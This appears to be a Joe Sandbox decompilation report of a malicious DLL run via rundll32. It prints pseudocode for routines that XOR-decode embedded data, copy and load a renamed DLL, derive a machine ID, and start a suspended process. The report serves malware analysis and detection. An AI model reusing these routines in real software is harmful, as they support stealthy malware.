Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 53a7b4d00723407f0d789300976f2dd1b806011e9297163532ce598cbbef6b78
Instruction ID: d776720c0b4c11bf6a46d7560ebcee6aca48920ffc03f030aee782babc1786af
Opcode Fuzzy Hash: 53a7b4d00723407f0d789300976f2dd1b806011e9297163532ce598cbbef6b78
Instruction Fuzzy Hash: 2831E136E182559BEB54CFADC884AAEBBF5EF44384F244469D809E7249DB30DD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000169F Relevance: 4.6, APIs: 3, Instructions: 95
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E1000169F(WCHAR* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v20;
				void* __ecx;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t25;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t33;
				intOrPtr _t36;
				intOrPtr _t46;
				void* _t50;
				char _t53;

				_t58 = __fp0;
				_t48 = __edx;
				E1000188E();
				GetLocaleInfoA(1, 2,  &_v20, 4); // executed
				_t18 = E1000B231(_t48, __fp0); // executed
				 *0x10020d88 = _t18;
				if(_t18 != 0) {
					E10014C5F( *((intOrPtr*)(_t18 + 0x224)));
					_t20 =  *0x10020d88; // 0x4a1fc98
					_pop(_t43);
					__eflags =  *((intOrPtr*)(_t20 + 0x101c)) - 1;
					if( *((intOrPtr*)(_t20 + 0x101c)) != 1) {
						L7:
						__eflags =  *(_t20 + 0x1898) & 0x00010082;
						if(( *(_t20 + 0x1898) & 0x00010082) != 0) {
							L11:
							 *((intOrPtr*)(_t20 + 0xa4)) = 1;
							_t21 =  *0x10020d88; // 0x4a1fc98
							__eflags =  *((intOrPtr*)(_t21 + 0x214)) - 3;
							if(__eflags == 0) {
								L10:
								E10002E87();
								L13:
								__eflags = 0;
								return 0;
							}
							E100014FA(_t48, __eflags, _t58);
							goto L13;
						}
						_t11 = _t20 + 0x224; // 0x10000000
						_t48 =  *_t11;
						_t25 = E1000A843( *_t11); // executed
						__eflags = _t25;
						_t20 =  *0x10020d88; // 0x4a1fc98
						if(_t25 == 0) {
							goto L11;
						}
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if( *((intOrPtr*)(_t20 + 0x214)) != 3) {
							goto L13;
						}
						goto L10;
					}
					__imp__CoInitializeEx(0, 6, __edi, __esi);
					_t26 =  *0x10020d88; // 0x4a1fc98
					_push(0);
					_push(0x1001db00);
					_t27 = _t26 + 0x228;
					__eflags = _t27;
					_push(_t27);
					_t50 = E10009DC8(0x1001db00);
					_t53 = E100019A6(0x1001db00, 0x420);
					_v8 = _t53;
					while(1) {
						_t46 =  *0x10020d88; // 0x4a1fc98
						_t30 =  *0x10020d50; // 0x4a1fa80
						_t32 =  *0x10020d6c; // 0x4a1fc60
						_t33 =  *_t32( *((intOrPtr*)(_t30 + 0x54))(_t53, _t46 + 0x1644, _t50, 0, 0));
						__eflags = _t33 - 5;
						if(_t33 != 5) {
							break;
						}
						Sleep(0x7d0);
					}
					E1000A291( &_v8);
					_t36 =  *0x10020d58; // 0x4a1f900
					_pop(_t43);
					 *((intOrPtr*)(_t36 + 0xec))(0);
					_t20 =  *0x10020d88; // 0x4a1fc98
					goto L7;
				}
				return 1;
			}

0x1000169f
0x1000169f
0x100016a6
0x100016b7
0x100016be
0x100016c3
0x100016cb
0x100016da
0x100016df
0x100016e4
0x100016e5
0x100016eb
0x1000177d
0x1000177d
0x10001787
0x100017af
0x100017af
0x100017b5
0x100017ba
0x100017c1
0x100017a8
0x100017a8
0x100017c8
0x100017c8
0x00000000
0x100017c8
0x100017c3
0x00000000
0x100017c3
0x10001789
0x10001789
0x10001790
0x10001795
0x10001797
0x1000179d
0x00000000
0x00000000
0x1000179f
0x100017a6
0x00000000
0x00000000
0x00000000
0x100017a6
0x100016f7
0x100016fd
0x10001707
0x10001709
0x1000170a
0x1000170a
0x1000170f
0x1000171b
0x10001722
0x10001727
0x1000172a
0x1000172a
0x10001730
0x10001746
0x1000174b
0x1000174d
0x10001750
0x00000000
0x00000000
0x10001757
0x10001757
0x10001763
0x10001768
0x1000176d
0x10001770
0x10001776
0x00000000
0x1000177c
0x00000000

APIs

GetLocaleInfoA.KERNELBASE(00000001,00000002,?,00000004), ref: 100016B7

Part of subcall function 1000B231: GetCurrentProcessId.KERNEL32(?,?,00000001), ref: 1000B258
Part of subcall function 1000B231: GetLastError.KERNEL32(?,?,00000001), ref: 1000B352

CoInitializeEx.OLE32(00000000,00000006), ref: 100016F7
Sleep.KERNEL32(000007D0), ref: 10001757

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentErrorInfoInitializeLastLocaleProcessSleep
String ID:
API String ID: 1553610659-0
Opcode ID: a3b221c9c71cf84b0916dd40fa4d01affb539a29fbae8fe4750e20d2a455a4cc
Instruction ID: c7de880085743f48c4dc6eda8a205b57bb238f0f0f622972f11a8f00f1fd75af
Opcode Fuzzy Hash: a3b221c9c71cf84b0916dd40fa4d01affb539a29fbae8fe4750e20d2a455a4cc
Instruction Fuzzy Hash: 7331F174640201AFF300EBA4CC8AFDA37F9EF45391F614079F5099B1A6DA74E8428B61

Uniqueness

Uniqueness Score: -1.00%

Function 100010A0 Relevance: 3.1, APIs: 2, Instructions: 104
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			_entry_(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
				long _v8;
				void* _t23;
				intOrPtr _t24;
				WCHAR* _t33;
				long _t34;
				WCHAR* _t38;
				void* _t41;
				intOrPtr _t46;
				struct _SECURITY_ATTRIBUTES* _t49;
				struct _SECURITY_ATTRIBUTES* _t50;
				void* _t59;
				void* _t65;
				void* _t67;
				intOrPtr* _t71;

				_push(__ecx);
				if(_a8 != 1) {
					if(_a8 != 0) {
						goto L12;
					} else {
						_t24 =  *0x10020d58; // 0x4a1f900
						 *((intOrPtr*)(_t24 + 0xbc))(0xaa);
						goto L8;
					}
				} else {
					E10009510();
					E100098FF();
					 *0x10020d60 = _a4;
					 *0x10020d5c = 1;
					E10014D5F(_a4);
					_a4 =  *[fs:0x30];
					if(_a4[1] != 0) {
						_t49 = 0;
						_t65 = 0x80;
						do {
							 *(_t49 + 0x1001f6f0) =  *(_t49 + 0x1001f6f0) ^ 0x000000b7;
							_t49 =  &(_t49->nLength);
						} while (_t49 < _t65);
						_t50 = 0;
						do {
							 *(_t50 + 0x1001f050) =  *(_t50 + 0x1001f050) ^ 0x000000b7;
							_t50 =  &(_t50->nLength);
						} while (_t50 < _t65);
					}
					 *0x10020d58 = E100098AE(0x1001d948, 0x140, 0xb6);
					 *_t71 = 0x7e7;
					_t33 = E1000948D(0x1001d948);
					_pop(_t59);
					_a4 = _t33;
					_t34 = GetFileAttributesW(_t33); // executed
					_push( &_a4);
					if(_t34 == 0xffffffff) {
						E1000A291();
						_t38 = E100094AD(E100019A6(_t59, 0xc1));
						_a4 = _t38;
						if(_t38 != 0) {
							_t67 = 0x6c;
							 *0x10020d50 = E100098AE(0x1001da90, _t67);
							E100017CF(_t67);
							E1000953B( &_a4, 0xfffffffe);
							_t46 =  *0x10020d58; // 0x4a1f900
							 *((intOrPtr*)(_t46 + 0xec))(1, 0x60e);
						}
						_v8 = 0;
						_t41 = CreateThread(0, 0, E1000169F, 0, 0,  &_v8);
						 *0x10020d54 = _t41;
						if(_t41 == 0) {
							goto L8;
						} else {
							L12:
							E100011EB(_a8);
							_t23 = 1;
						}
					} else {
						E1000A291();
						L8:
						_t23 = 0;
					}
				}
				return _t23;
			}

0x100010a3
0x100010ac
0x100011d4
0x00000000
0x100011d6
0x100011d6
0x100011e0
0x00000000
0x100011e0
0x100010b2
0x100010b2
0x100010b7
0x100010c0
0x100010c5
0x100010cb
0x100010d7
0x100010e3
0x100010e5
0x100010e7
0x100010ea
0x100010ea
0x100010f1
0x100010f2
0x100010f6
0x100010f8
0x100010f8
0x100010ff
0x10001100
0x100010f8
0x10001118
0x1000111d
0x10001124
0x10001129
0x1000112b
0x1000112e
0x1000113a
0x1000113b
0x1000114a
0x1000115d
0x10001162
0x10001167
0x10001170
0x1000117b
0x10001180
0x1000118b
0x10001190
0x10001199
0x10001199
0x100011a2
0x100011b4
0x100011b7
0x100011be
0x00000000
0x100011c0
0x100011c0
0x100011c3
0x100011c8
0x100011c8
0x1000113d
0x1000113d
0x10001143
0x10001143
0x10001143
0x1000113b
0x100011cd

APIs

Part of subcall function 10009510: HeapCreate.KERNELBASE(00000000,00096000,00000000,100010B7), ref: 10009519

GetFileAttributesW.KERNELBASE(00000000), ref: 1000112E
CreateThread.KERNELBASE(00000000,00000000,1000169F,00000000,00000000,?), ref: 100011B4

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: Create$AttributesFileHeapThread
String ID:
API String ID: 183707735-0
Opcode ID: b9a97e9ba8987b8b4a6afe3dfcbca0106fcc9cffada8fd1d1a9faea36bf9659a
Instruction ID: 4162b632d5d1cc40d92bf149abb497073d4d7b652b418d41a2fce86e5811987f
Opcode Fuzzy Hash: b9a97e9ba8987b8b4a6afe3dfcbca0106fcc9cffada8fd1d1a9faea36bf9659a
Instruction Fuzzy Hash: A131D075604341ABF704DFA9DC85EDA3BE9EB853D0F208129F519CB2AADB34E581CB11

Uniqueness

Uniqueness Score: -1.00%

Function 1000A2BD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102
filelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E1000A2BD(void* __ecx, void* __edx) {
				char _v8;
				WCHAR* _v12;
				char _v140;
				char _t10;
				intOrPtr _t15;
				void* _t20;
				intOrPtr _t21;
				intOrPtr _t27;
				WCHAR* _t29;
				struct HINSTANCE__* _t32;
				int _t40;
				void* _t51;
				char _t52;
				char* _t53;
				intOrPtr _t54;
				WCHAR* _t56;

				_t40 = 0;
				_t10 = E1000948D(__ecx, 0x815);
				_t54 =  *0x10020d88; // 0x4a1fc98
				_t52 = _t10;
				_t55 = _t54 + 0xb0;
				_v8 = _t52;
				E1000B76A( &_v140, 0x40, L"%08x", E1000EEEC(_t55, E1000D389(_t54 + 0xb0), 0));
				_t15 =  *0x10020d88; // 0x4a1fc98
				_t3 = _t15 + 0xa8; // 0x1
				asm("sbb eax, eax");
				_t20 = E1000948D(_t55, ( ~( *_t3) & 0x00000a5e) + 0x3e8);
				_push(0);
				_push(_t52);
				_t53 = "\\";
				_push(_t53);
				_push(_t20);
				_t21 =  *0x10020d88; // 0x4a1fc98
				_push(_t53);
				_t56 = E10009DC8(_t21 + 0x1020);
				_v12 = _t56;
				E1000A291( &_v8);
				_push(0);
				_push(L"dll");
				_push(".");
				_push( &_v140);
				_t27 =  *0x10020d88; // 0x4a1fc98
				_push(_t53);
				_t29 = E10009DC8(_t27 + 0x122a);
				 *0x10020e74 = _t29;
				CopyFileW(_t56, _t29, 0);
				_t32 = LoadLibraryW( *0x10020e74); // executed
				 *0x10020e6c = _t32;
				if(_t32 != 0) {
					_push(_t32);
					_t51 = 0x30;
					_t40 = E10009863(0x1001db08, _t51);
				}
				E1000953B( &_v12, 0xfffffffe);
				E100096BF( &_v140, 0, 0x80);
				if(_t40 == 0) {
					E1000953B(0x10020e74, 0xfffffffe);
				}
				return _t40;
			}

0x1000a2ce
0x1000a2d0
0x1000a2d5
0x1000a2db
0x1000a2de
0x1000a2e4
0x1000a307
0x1000a30c
0x1000a311
0x1000a319
0x1000a326
0x1000a32b
0x1000a32c
0x1000a32d
0x1000a332
0x1000a333
0x1000a334
0x1000a33e
0x1000a345
0x1000a34b
0x1000a34e
0x1000a353
0x1000a354
0x1000a359
0x1000a364
0x1000a365
0x1000a36f
0x1000a371
0x1000a379
0x1000a386
0x1000a392
0x1000a398
0x1000a39f
0x1000a3a1
0x1000a3a4
0x1000a3b0
0x1000a3b0
0x1000a3b8
0x1000a3cb
0x1000a3d5
0x1000a3de
0x1000a3e4
0x1000a3eb

APIs

Part of subcall function 1000B76A: _vsnwprintf.MSVCRT ref: 1000B787

Part of subcall function 10009DC8: lstrcatW.KERNEL32(00000000,00000000), ref: 10009E07

CopyFileW.KERNELBASE(00000000,00000000,00000000), ref: 1000A386
LoadLibraryW.KERNELBASE ref: 1000A392

Strings

dll, xrefs: 1000A354
%08x, xrefs: 1000A2F9

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: CopyFileLibraryLoad_vsnwprintflstrcat
String ID: %08x$dll
API String ID: 722183478-2963171978
Opcode ID: f72d2fc330ce88209f4c2237a74f7f65a0389a52750ff7e7d10f720e875abced
Instruction ID: c55651dfc9cb6555f84ec611fae2886d2378291d09008a97343f4257c843f593
Opcode Fuzzy Hash: f72d2fc330ce88209f4c2237a74f7f65a0389a52750ff7e7d10f720e875abced
Instruction Fuzzy Hash: 733184B6A403147BF740E7A4DC86F9B37ADDF85790F104166F504E7296DE34AE818760

Uniqueness

Uniqueness Score: -1.00%

Function 1000A843 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 145
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000A843(WCHAR* __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				char _v28;
				char _v29;
				intOrPtr _v40;
				short _v44;
				void* __ebx;
				signed int _t48;
				signed int _t57;
				intOrPtr _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				char _t80;
				char _t94;
				signed int _t96;
				char _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				void* _t102;
				void* _t103;

				_t95 = __edx;
				_t80 = 0;
				_v24 = __edx;
				_v20 = 0;
				_v8 = 0;
				_t48 = E1000D389("document");
				_t96 = _t48;
				_v29 = 0;
				_t98 = 0xf;
				if(_t96 <= _t98) {
					__eflags = _t96;
					if(_t96 == 0) {
						goto L5;
					}
					goto L3;
				} else {
					_t96 = _t98;
					L3:
					_t94 = _t80;
					do {
						_t5 = _t94 + 0x41; // 0x41
						 *((char*)(_t102 + _t94 - 0x28)) = _t5;
						_t94 = _t94 + 1;
					} while (_t94 < _t96);
					L5:
					lstrlenW( &_v44);
					_t97 = E1000A73E( &_v20);
					_v28 = _t97;
					if(_t97 != 0) {
						_t99 = _v20;
						_v16 = _t80;
						__eflags = _t99;
						if(_t99 == 0) {
							L27:
							E1000953B( &_v28, _t80);
							return _v8;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = _v8 - _t80;
							if(_v8 != _t80) {
								break;
							}
							_t100 = _v8;
							_v12 = 1;
							do {
								__eflags = _t100;
								if(_t100 != 0) {
									break;
								}
								E100096BF( &_v44, _t80, 0x10);
								_t60 =  *0x10020d88; // 0x4a1fc98
								_t103 = _t103 + 0xc;
								__eflags =  *(_t60 + 0x1898) & 0x00000200;
								if(__eflags != 0) {
									E1000EA4B(_t80, _t95, __eflags);
								}
								_t95 =  &_v44;
								_t62 = E1000D038( *((intOrPtr*)(_t97 + _v16 * 4)),  &_v44); // executed
								__eflags = _t62;
								if(_t62 >= 0) {
									_t95 =  &_v44;
									_t71 = E1000AA02(0x100015c3,  &_v44, _v24, _v12); // executed
									__eflags = _t71;
									if(__eflags != 0) {
										_t72 = E1000AB5A( &_v44, __eflags); // executed
										__eflags = _t72;
										if(_t72 != 0) {
											_t100 = 1;
											__eflags = 1;
										}
									}
								}
								__eflags = _v44 - _t80;
								if(_v44 != _t80) {
									__eflags = _t100;
									if(_t100 == 0) {
										_t69 =  *0x10020d58; // 0x4a1f900
										 *((intOrPtr*)(_t69 + 0x114))(_v44, _t80);
									}
									_t65 =  *0x10020d58; // 0x4a1f900
									 *((intOrPtr*)(_t65 + 0x34))(_v40);
									_t67 =  *0x10020d58; // 0x4a1f900
									 *((intOrPtr*)(_t67 + 0x34))(_v44);
								}
								_t64 = _v12 + 1;
								_v12 = _t64;
								__eflags = _t64 - 2;
							} while (_t64 <= 2);
							_t57 = _v16 + 1;
							_v8 = _t100;
							_t99 = _v20;
							_v16 = _t57;
							__eflags = _t57 - _t99;
							if(_t57 < _t99) {
								continue;
							} else {
								break;
							}
							do {
								goto L26;
							} while (_t99 != 0);
							goto L27;
						}
						L26:
						E1000953B(_t97, 0xfffffffe);
						_t97 = _t97 + 4;
						_t99 = _t99 - 1;
						__eflags = _t99;
					}
					_t74 = E1000D389("simplify");
					_v29 = _t80;
					if(_t74 > _t98) {
						do {
							L8:
							_t12 = _t80 + 0x41; // 0x41
							 *((char*)(_t102 + _t80 - 0x28)) = _t12;
							_t80 = _t80 + 1;
						} while (_t80 < _t98);
						L9:
						lstrlenW( &_v44);
						return 0;
					}
					_t98 = _t74;
					if(_t98 == 0) {
						goto L9;
					}
					goto L8;
				}
			}

0x1000a843
0x1000a84c
0x1000a84e
0x1000a856
0x1000a859
0x1000a85c
0x1000a864
0x1000a866
0x1000a869
0x1000a86c
0x1000a872
0x1000a874
0x00000000
0x00000000
0x00000000
0x1000a86e
0x1000a86e
0x1000a876
0x1000a876
0x1000a878
0x1000a878
0x1000a87b
0x1000a87f
0x1000a880
0x1000a884
0x1000a888
0x1000a896
0x1000a898
0x1000a89d
0x1000a8d4
0x1000a8d7
0x1000a8da
0x1000a8dc
0x1000a9c6
0x1000a9cb
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a8e2
0x1000a8e2
0x1000a8e2
0x1000a8e5
0x00000000
0x00000000
0x1000a8eb
0x1000a8ee
0x1000a8f5
0x1000a8f5
0x1000a8f7
0x00000000
0x00000000
0x1000a904
0x1000a909
0x1000a90e
0x1000a911
0x1000a91b
0x1000a922
0x1000a922
0x1000a92a
0x1000a930
0x1000a935
0x1000a937
0x1000a93c
0x1000a947
0x1000a94e
0x1000a950
0x1000a955
0x1000a95a
0x1000a95c
0x1000a960
0x1000a960
0x1000a960
0x1000a95c
0x1000a950
0x1000a961
0x1000a964
0x1000a966
0x1000a968
0x1000a96a
0x1000a973
0x1000a973
0x1000a979
0x1000a981
0x1000a984
0x1000a98c
0x1000a98c
0x1000a992
0x1000a993
0x1000a996
0x1000a996
0x1000a9a2
0x1000a9a3
0x1000a9a6
0x1000a9a9
0x1000a9ac
0x1000a9ae
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a9b4
0x00000000
0x00000000
0x00000000
0x1000a9b4
0x1000a9b4
0x1000a9b7
0x1000a9bd
0x1000a9c1
0x1000a9c1
0x1000a9c1
0x1000a8a4
0x1000a8a9
0x1000a8af
0x1000a8b7
0x1000a8b7
0x1000a8b7
0x1000a8ba
0x1000a8be
0x1000a8bf
0x1000a8c3
0x1000a8c7
0x00000000
0x1000a8cd
0x1000a8b1
0x1000a8b5
0x00000000
0x00000000
0x00000000
0x1000a8b5

APIs

lstrlenW.KERNEL32(?,?,?,00000001), ref: 1000A888
lstrlenW.KERNEL32(?,?,?,00000001), ref: 1000A8C7

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

Strings

document, xrefs: 1000A851
simplify, xrefs: 1000A89F

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: lstrlen$memset
String ID: document$simplify
API String ID: 3887242890-3319049627
Opcode ID: a0d654072406d2cf88ca564220ee3e8584bd0ac9625c12fa9a8df3b06a27825b
Instruction ID: 38bac404593f47c8c3d4ec902252394743ffc0b16ac7b4443815f8f3ec745690
Opcode Fuzzy Hash: a0d654072406d2cf88ca564220ee3e8584bd0ac9625c12fa9a8df3b06a27825b
Instruction Fuzzy Hash: 1A41B235D012199FEB01DBD4C8859ED7BF5EF4A3E0F254269E901B7249DB30ADC18BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6D1 Relevance: 6.1, APIs: 4, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E1000D6D1(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E100096BF(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x10020d58; // 0x4a1f900
				 *((intOrPtr*)(_t23 + 0xc0))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E1000948D(_t44, 0x78);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E1000A291( &_v16);
				_t33 = E1000D3A2(_t43);
				E1000B76A( &(_t43[E1000D3A2(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000D3A2(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000EEEC(_t43, E1000D3A2(_t43) + _t40, 0);
			}

0x1000d6d1
0x1000d6da
0x1000d6e6
0x1000d6ec
0x1000d6ee
0x1000d6f6
0x1000d704
0x1000d709
0x1000d718
0x1000d720
0x1000d72d
0x1000d747
0x1000d74c
0x1000d74e
0x1000d755
0x1000d765
0x1000d776
0x1000d780
0x1000d788
0x1000d78f
0x1000d792
0x1000d7af

APIs

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

lstrcpynW.KERNEL32(?,?,00000100), ref: 1000D718
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000D747

Part of subcall function 1000B76A: _vsnwprintf.MSVCRT ref: 1000B787

lstrcatW.KERNEL32(?,00000114), ref: 1000D780
CharUpperBuffW.USER32(?,00000000), ref: 1000D792

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 455400327-0
Opcode ID: 6807d17cbedc06270a25dc43d6def3b120d509b0ea666ffc790bda4984b7d484
Instruction ID: 59fefc39a5dd0a038c9dcbd64369fbb0134c561318443d00a0afe8b727768b80
Opcode Fuzzy Hash: 6807d17cbedc06270a25dc43d6def3b120d509b0ea666ffc790bda4984b7d484
Instruction Fuzzy Hash: D92174B6E00214BFE700EBB4CC8AFAF77BCEF84250F104169F505E6195EA74AE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 1000E47C Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000E47C(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10009525(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000953B( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x1000e47f
0x1000e480
0x1000e487
0x1000e48f
0x1000e493
0x1000e49c
0x1000e4e2
0x1000e4e2
0x1000e4a9
0x1000e4b1
0x1000e4b3
0x1000e4b9
0x1000e4d2
0x00000000
0x1000e4d4
0x1000e4d9
0x00000000
0x1000e4df
0x1000e4bb
0x1000e4bb
0x1000e4bb
0x1000e4bb
0x1000e4b9
0x1000e4e8

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000E4FD,00000000,00000000,?,1000E526), ref: 1000E497
GetLastError.KERNEL32(?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E49E

Part of subcall function 10009525: RtlAllocateHeap.76D4C8D1(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E4CD

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: f9ac2a2fc570e9a41b99c82958fd9a332a857a23953b2221aadec2e17e5d6f61
Instruction ID: 1eed812b881aefb00d6193f01853791bde1d72691e5b42abaf90924a6ce1d54a
Opcode Fuzzy Hash: f9ac2a2fc570e9a41b99c82958fd9a332a857a23953b2221aadec2e17e5d6f61
Instruction Fuzzy Hash: 6701AD72601265BFE721CBA6DC88D9B7FECEF457E1B214165F905E2225E670EE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D038 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E1000D038(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E100096BF(__edx, 0, 0x10);
				E100096BF( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000d049
0x1000d056
0x1000d05e
